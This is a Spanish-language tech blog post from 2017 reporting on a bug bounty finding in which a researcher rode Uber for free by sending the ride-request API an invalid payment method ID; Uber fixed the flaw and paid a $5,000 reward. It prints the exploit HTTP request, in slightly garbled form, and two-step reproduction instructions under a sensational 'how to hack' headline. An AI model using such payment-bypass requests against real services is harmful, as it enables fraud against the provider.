Revista Tecnología

Cómo hackear Uber y viajar gratis

Publicado el 14 marzo 2017 por Henry Ramirez @henryramirezf

Cómo hackear Uber y viajar gratis

El hacker indio viajó en Uber gratis debido a una falla que descubrió en la Anand Prakash aplicación de la empresa.

Los atacantes cibernéticos podrían haber abusado de esta falla y tener viajar gratis ilimitadas usando sus cuenta de uber.

Uber Technologies Inc. es una compañía con una red del transporte en línea con sede en San Francisco, California, con operaciones en 528 ciudades de todo el mundo.

Los usuarios pueden crear su cuenta en Uber.com y pueden empezar a usar su servicio. Cuando se completa una vuelta el usuario puede pagar en efectivo o usar su tarjeta de crédito o débito.

Sin embargo, mediante la especificación de un método de pago válido, por ejemplo: ABC, XYZ, etc, usted podría usar Uber de forma gratuita.

Para demostrar el error, el hacker obtuvo permiso del equipo de Uber y viajó gratis en los Estados Unidos y la India sin pagar un centavo.

Muestra de código del fallo:

la POST / api / dial / v2 / peticiones HTTP / 1.1
Host: dial.uber.com

{ "start_latitude": 12.925151699999999, "start_longitude": 77.6657536,


"product_id": "db6779d6-d8da-479f-8ac7-8068f4dade6f" "payment_method_id": "xyz"}

Como reproducir este hack:

1) Hacer la solicitud anterior con caracteres aleatorios como payment_method_id.

2) Listo, el viaje es Gratis

La prueba de concepto en vídeo:

El equipo de Uber rápidamente corrigió la falla, y el hacker indio Anand Prakash recibió $5.000 dólares como recompensa por haber descubierto la falla.


Volver a la Portada de Logo Paperblog